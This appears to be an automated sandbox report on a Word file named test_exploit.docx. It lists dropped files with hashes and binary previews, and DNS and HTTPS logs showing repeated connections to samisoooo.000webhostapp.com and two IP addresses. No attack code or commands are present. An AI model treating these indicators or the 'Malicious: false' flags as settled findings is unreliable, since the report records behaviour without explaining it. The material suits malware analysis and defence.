SHA-512:	AA8A1C47BD2E25A35DA08976E119449AF065DD30957A37170F0BF94A8C9B612EDD8AE32138C7A100E9BAD685E6EA9838DBCC7AB11679882FD8829F46D2848FDF
Malicious:	false
Preview:	......M.eFy...z...ox..D.X.$.?.oS,...X.F...Fa.q................................\|@.N.S.+.tw.........".EK.K.H..tb........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{D7DEA83B-46CD-4801-9593-7D8BD5CE2A97}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025488042178931723
Encrypted:	false
SSDEEP:	6:I3DPcM0abvxggLR3Ep/DrpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPsabbERDLvYg3J/
MD5:	F7549CC4B3E9A52589570A92D5F4C8ED
SHA1:	DC287659BBED8383EFBD4BDAB4F16030063A0738
SHA-256:	F0BFD4C1EB73AD82036D4FE228AC44FEA4AE9C831965A310A35E82574A8BB67D
SHA-512:	A9EC612D886A05E44142018C24EC287D4557400E84CCA2458949BE0E267D406DB44DF8D5DC7F55C588B4685442C84DDFA1016F383C67EA83846361E336527475
Malicious:	false
Preview:	......M.eFy...z.....BI....(..S,...X.F...Fa.q..............................l8.x.D.yK3..Q............-.nK.*.:..v......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.517600117487426
Encrypted:	false
SSDEEP:	3:bDuMJlJ9bJKMbpSmxWaNJKMbpSv:bCCbXbprXbpc
MD5:	A8AFC82B523D89A72501353BFEAF2A07
SHA1:	DABA6C5AB64BA98EBAE9E4DE1E55B177C05F106D
SHA-256:	9D6A0DB1FBB6911802B5727583F6C045413087F3515795294DF4D66223801257
SHA-512:	9C017A55CC761000B4CAEF114C5EB368E26E2EE1F978852CF5A4FC14670698E8080CBFE2470F4769CD09042938CA441E104ED1FA1D9752B4DA9285C6ED5E156D
Malicious:	false
Preview:	[folders]..Templates.LNK=0..test_exploit.docx.LNK=0..[misc]..test_exploit.docx.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\test_exploit.docx.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Jun 18 23:00:01 2022, mtime=Sat Jun 18 23:00:01 2022, atime=Sat Jun 18 23:00:13 2022, length=13714, window=hide
Category:	dropped
Size (bytes):	1054
Entropy (8bit):	4.480772317461922
Encrypted:	false
SSDEEP:	12:88emGjW0gXg/XAlCPCHaXBKBnB/KVbX+W12jaxrWYicvbyyXP/dW0NDtZ3YilMMh:88c/XTRKJMV3xrQeWyPl3Dv3qVY7h
MD5:	F23DB4F73D80F950340D228C47293FBB
SHA1:	9831E95028F54EED2F9EB2F7B26CEA89CEE528B1
SHA-256:	C2D64C6138163FA93AFA285092B9A3B001592F0660E6600412ECDA5F368314B6
SHA-512:	8FDE8B7A3FB1B7B63A9C80C835D91B77A48B009EE5F5A157D4FCCA200D40B26CE0E8F3B756F82BA284D200F8275DE189564B0F4A9D95A7A610231F2B0741B063
Malicious:	false
Preview:	L..................F.... ......o......o....L..o....5...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT.....&=....U...............A.l.b.u.s.....z.1......T....Desktop.d......QK.X.T....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2..5...T.. .TEST_E~1.DOC..Z.......T...T...........................t.e.s.t._.e.x.p.l.o.i.t...d.o.c.x...d.o.c.x.......................-...8...[............?J......C:\Users\..#...................\\390120\Users.user\Desktop\test_exploit.docx.docx.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.t.e.s.t._.e.x.p.l.o.i.t...d.o.c.x...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......390120..........D_....3N...W..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020303
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
MD5:	1674A1C7C99CD9FAADA789F5E2AEB335
SHA1:	26D9E81D5ED584A899A94D5EA8945A5AE3403F85
SHA-256:	BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
SHA-512:	B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\Desktop\~$st_exploit.docx.docx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020303
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
MD5:	1674A1C7C99CD9FAADA789F5E2AEB335
SHA1:	26D9E81D5ED584A899A94D5EA8945A5AE3403F85
SHA-256:	BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
SHA-512:	B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...

Static File Info

General

File type:	Microsoft Word 2007+
Entropy (8bit):	7.044599643065091
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	test_exploit.docx.docx
File size:	13714
MD5:	fcb4a6f299be7168bea772af871e203e
SHA1:	26428cb21220443643e53c619a98dac6d35acae6
SHA256:	e907ec4b1da6b2fa4e2fcff5b80d8c004f3b8922fcf62a76988a5a16036dcf8f
SHA512:	6ee9f865fbff6aa4655f8712fa7c555999763086a4e5f2620731902352e861ce5d8f1a6ecda7999df179fdf947f797546ea788cdb0b6528b0efb067be7b96be9
SSDEEP:	384:/+jY8hC78L88KAv3qYBN7LXQ/2j8YYB5LUY/:Si8L81AS41LXg2wbn
TLSH:	94528F27CB0AE470C65A11BD00EA03F6E20C8549C694FBAEAD15F1DD52D4ACB0B777C9
File Content Preview:	PK..........!....;}...........[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e6a2a2a4b4b4a4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 18, 2022 16:59:58.528666973 CEST	49171	443	192.168.2.22	145.14.144.188
Jun 18, 2022 16:59:58.528743982 CEST	443	49171	145.14.144.188	192.168.2.22
Jun 18, 2022 16:59:58.528858900 CEST	49171	443	192.168.2.22	145.14.144.188
Jun 18, 2022 16:59:58.541851997 CEST	49171	443	192.168.2.22	145.14.144.188
Jun 18, 2022 16:59:58.541882992 CEST	443	49171	145.14.144.188	192.168.2.22
Jun 18, 2022 16:59:58.807811975 CEST	443	49171	145.14.144.188	192.168.2.22
Jun 18, 2022 16:59:58.807944059 CEST	49171	443	192.168.2.22	145.14.144.188
Jun 18, 2022 16:59:58.817524910 CEST	49171	443	192.168.2.22	145.14.144.188
Jun 18, 2022 16:59:58.817557096 CEST	443	49171	145.14.144.188	192.168.2.22
Jun 18, 2022 16:59:58.817847967 CEST	443	49171	145.14.144.188	192.168.2.22
Jun 18, 2022 16:59:58.817941904 CEST	49171	443	192.168.2.22	145.14.144.188
Jun 18, 2022 16:59:59.083862066 CEST	49171	443	192.168.2.22	145.14.144.188
Jun 18, 2022 16:59:59.124516010 CEST	443	49171	145.14.144.188	192.168.2.22
Jun 18, 2022 16:59:59.211081982 CEST	443	49171	145.14.144.188	192.168.2.22
Jun 18, 2022 16:59:59.211261988 CEST	49171	443	192.168.2.22	145.14.144.188
Jun 18, 2022 16:59:59.211303949 CEST	443	49171	145.14.144.188	192.168.2.22
Jun 18, 2022 16:59:59.211364985 CEST	49171	443	192.168.2.22	145.14.144.188
Jun 18, 2022 16:59:59.211776018 CEST	49171	443	192.168.2.22	145.14.144.188
Jun 18, 2022 16:59:59.211803913 CEST	443	49171	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:04.959599018 CEST	49172	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:04.959659100 CEST	443	49172	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:04.959788084 CEST	49172	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:04.960570097 CEST	49172	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:04.960597992 CEST	443	49172	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:05.218048096 CEST	443	49172	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:05.218158960 CEST	49172	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:05.225377083 CEST	49172	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:05.225402117 CEST	443	49172	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:05.225872993 CEST	443	49172	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:05.250832081 CEST	49172	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:05.296495914 CEST	443	49172	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:05.470288038 CEST	443	49172	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:05.470370054 CEST	443	49172	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:05.470526934 CEST	49172	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:05.470666885 CEST	49172	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:05.470701933 CEST	443	49172	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:09.586832047 CEST	49173	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:09.586893082 CEST	443	49173	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:09.586992979 CEST	49173	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:09.589088917 CEST	49173	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:09.589122057 CEST	443	49173	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:09.848169088 CEST	443	49173	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:09.848274946 CEST	49173	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:09.854770899 CEST	49173	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:09.854793072 CEST	443	49173	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:09.855432034 CEST	443	49173	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:09.880600929 CEST	49173	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:09.924546003 CEST	443	49173	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:10.097645044 CEST	443	49173	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:10.097750902 CEST	443	49173	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:10.097800970 CEST	49173	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:10.098002911 CEST	49173	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:10.098026991 CEST	443	49173	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:10.134859085 CEST	49174	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:10.134911060 CEST	443	49174	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:10.134984016 CEST	49174	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:10.135322094 CEST	49174	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:10.135344982 CEST	443	49174	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:10.393136978 CEST	443	49174	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:10.393312931 CEST	49174	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:10.427200079 CEST	49174	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:10.427231073 CEST	443	49174	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:10.430032015 CEST	49174	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:10.430047035 CEST	443	49174	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:10.646516085 CEST	443	49174	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:10.646696091 CEST	443	49174	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:10.646828890 CEST	443	49174	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:10.646831036 CEST	49174	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:10.646975994 CEST	49174	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:10.661453009 CEST	49174	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:10.661475897 CEST	443	49174	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:10.975141048 CEST	49175	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:10.975181103 CEST	443	49175	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:10.975379944 CEST	49175	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:10.975888014 CEST	49175	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:10.975905895 CEST	443	49175	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:11.234024048 CEST	443	49175	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:11.234309912 CEST	49175	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:11.235171080 CEST	49175	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:11.235189915 CEST	443	49175	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:11.242556095 CEST	49175	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:11.242578030 CEST	443	49175	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:11.488049984 CEST	443	49175	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:11.488146067 CEST	443	49175	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:11.488208055 CEST	49175	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:11.488221884 CEST	49175	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:11.826637030 CEST	49175	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:11.826663017 CEST	443	49175	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:11.826668024 CEST	49175	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:11.826703072 CEST	49175	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:12.211162090 CEST	49176	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:12.211224079 CEST	443	49176	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:12.211308956 CEST	49176	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:12.211591005 CEST	49176	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:12.211617947 CEST	443	49176	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:12.470529079 CEST	443	49176	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:12.470727921 CEST	49176	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:12.471221924 CEST	49176	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:12.471246004 CEST	443	49176	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:12.474104881 CEST	49176	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:12.474123955 CEST	443	49176	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:12.723387003 CEST	443	49176	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:12.723891973 CEST	49176	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:12.723915100 CEST	443	49176	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:12.724014044 CEST	49176	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:12.731990099 CEST	443	49176	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:12.732547998 CEST	49176	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:12.761723042 CEST	49176	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:12.761769056 CEST	443	49176	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:12.761780977 CEST	49176	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:12.762372971 CEST	49176	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:12.767576933 CEST	49177	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:12.767610073 CEST	443	49177	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:12.767668009 CEST	49177	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:12.767880917 CEST	49177	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:12.767895937 CEST	443	49177	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:13.022217035 CEST	443	49177	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:13.022433996 CEST	49177	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:13.143368959 CEST	49177	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:13.143382072 CEST	443	49177	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:13.146275043 CEST	49177	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:13.146285057 CEST	443	49177	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:13.272622108 CEST	443	49177	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:13.272710085 CEST	49177	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:13.272758961 CEST	443	49177	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:13.272814989 CEST	49177	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:13.272913933 CEST	49177	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:13.272934914 CEST	443	49177	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:13.513499022 CEST	49178	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:13.513528109 CEST	443	49178	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:13.513628006 CEST	49178	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:13.513895035 CEST	49178	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:13.513906002 CEST	443	49178	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:13.775686979 CEST	443	49178	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:13.775861025 CEST	49178	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:13.788681030 CEST	49178	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:13.788707972 CEST	443	49178	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:13.789267063 CEST	443	49178	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:13.790390015 CEST	49178	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:13.836502075 CEST	443	49178	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:14.031027079 CEST	443	49178	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:14.031115055 CEST	443	49178	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:14.031207085 CEST	49178	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:14.031332016 CEST	49178	443	192.168.2.22	145.14.144.66
Jun 18, 2022 17:00:14.031343937 CEST	443	49178	145.14.144.66	192.168.2.22
Jun 18, 2022 17:00:14.041934967 CEST	49179	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:14.041990995 CEST	443	49179	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:14.042071104 CEST	49179	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:14.042373896 CEST	49179	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:14.042397022 CEST	443	49179	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:14.305516005 CEST	443	49179	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:14.305726051 CEST	49179	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:14.306538105 CEST	49179	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:14.306545973 CEST	443	49179	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:14.313333988 CEST	49179	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:14.313348055 CEST	443	49179	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:14.557437897 CEST	443	49179	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:14.557601929 CEST	443	49179	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:14.557663918 CEST	49179	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:14.557681084 CEST	443	49179	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:14.557691097 CEST	49179	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:14.557730913 CEST	49179	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:14.558073997 CEST	443	49179	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:14.558132887 CEST	49179	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:14.567720890 CEST	49179	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:14.567749023 CEST	443	49179	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:14.757110119 CEST	49180	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:14.757174969 CEST	443	49180	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:14.757278919 CEST	49180	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:14.758009911 CEST	49180	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:14.758042097 CEST	443	49180	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:15.014740944 CEST	443	49180	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:15.014918089 CEST	49180	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:15.015639067 CEST	49180	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:15.015657902 CEST	443	49180	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:15.018676043 CEST	49180	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:15.018697023 CEST	443	49180	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:15.267646074 CEST	443	49180	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:15.267776966 CEST	443	49180	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:15.267931938 CEST	49180	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:15.267999887 CEST	49180	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:15.268245935 CEST	49180	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:15.268280983 CEST	443	49180	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:15.268323898 CEST	49180	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:15.268373966 CEST	49180	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:15.522070885 CEST	49181	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:15.522105932 CEST	443	49181	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:15.522171974 CEST	49181	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:15.522913933 CEST	49181	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:15.522928953 CEST	443	49181	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:15.780817986 CEST	443	49181	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:15.781002045 CEST	49181	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:15.781821012 CEST	49181	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:15.781851053 CEST	443	49181	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:15.787062883 CEST	49181	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:15.787081003 CEST	443	49181	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:16.036770105 CEST	443	49181	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:16.036912918 CEST	443	49181	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:16.037317038 CEST	49181	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:16.037642956 CEST	49181	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:16.037677050 CEST	443	49181	145.14.144.188	192.168.2.22
Jun 18, 2022 17:00:16.037693024 CEST	49181	443	192.168.2.22	145.14.144.188
Jun 18, 2022 17:00:16.037759066 CEST	49181	443	192.168.2.22	145.14.144.188

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 18, 2022 16:59:58.482158899 CEST	55868	53	192.168.2.22	8.8.8.8
Jun 18, 2022 16:59:58.512624979 CEST	53	55868	8.8.8.8	192.168.2.22
Jun 18, 2022 17:00:04.886856079 CEST	49688	53	192.168.2.22	8.8.8.8
Jun 18, 2022 17:00:04.915551901 CEST	53	49688	8.8.8.8	192.168.2.22
Jun 18, 2022 17:00:04.925812006 CEST	58836	53	192.168.2.22	8.8.8.8
Jun 18, 2022 17:00:04.958412886 CEST	53	58836	8.8.8.8	192.168.2.22
Jun 18, 2022 17:00:09.536757946 CEST	50134	53	192.168.2.22	8.8.8.8
Jun 18, 2022 17:00:09.554107904 CEST	53	50134	8.8.8.8	192.168.2.22
Jun 18, 2022 17:00:09.556905985 CEST	55275	53	192.168.2.22	8.8.8.8
Jun 18, 2022 17:00:09.585844040 CEST	53	55275	8.8.8.8	192.168.2.22
Jun 18, 2022 17:00:13.309154034 CEST	59915	53	192.168.2.22	8.8.8.8
Jun 18, 2022 17:00:13.326579094 CEST	53	59915	8.8.8.8	192.168.2.22
Jun 18, 2022 17:00:13.481607914 CEST	54408	53	192.168.2.22	8.8.8.8
Jun 18, 2022 17:00:13.512608051 CEST	53	54408	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 18, 2022 16:59:58.482158899 CEST	192.168.2.22	8.8.8.8	0xde0b	Standard query (0)	samisoooo.000webhostapp.com	A (IP address)	IN (0x0001)
Jun 18, 2022 17:00:04.886856079 CEST	192.168.2.22	8.8.8.8	0x5bb	Standard query (0)	samisoooo.000webhostapp.com	A (IP address)	IN (0x0001)
Jun 18, 2022 17:00:04.925812006 CEST	192.168.2.22	8.8.8.8	0xf829	Standard query (0)	samisoooo.000webhostapp.com	A (IP address)	IN (0x0001)
Jun 18, 2022 17:00:09.536757946 CEST	192.168.2.22	8.8.8.8	0xf2ca	Standard query (0)	samisoooo.000webhostapp.com	A (IP address)	IN (0x0001)
Jun 18, 2022 17:00:09.556905985 CEST	192.168.2.22	8.8.8.8	0xdc64	Standard query (0)	samisoooo.000webhostapp.com	A (IP address)	IN (0x0001)
Jun 18, 2022 17:00:13.309154034 CEST	192.168.2.22	8.8.8.8	0xa86e	Standard query (0)	samisoooo.000webhostapp.com	A (IP address)	IN (0x0001)
Jun 18, 2022 17:00:13.481607914 CEST	192.168.2.22	8.8.8.8	0xdfe0	Standard query (0)	samisoooo.000webhostapp.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 18, 2022 16:59:58.512624979 CEST	8.8.8.8	192.168.2.22	0xde0b	No error (0)	samisoooo.000webhostapp.com	us-east-1.route-1.000webhost.awex.io		CNAME (Canonical name)	IN (0x0001)
Jun 18, 2022 16:59:58.512624979 CEST	8.8.8.8	192.168.2.22	0xde0b	No error (0)	us-east-1.route-1.000webhost.awex.io		145.14.144.188	A (IP address)	IN (0x0001)
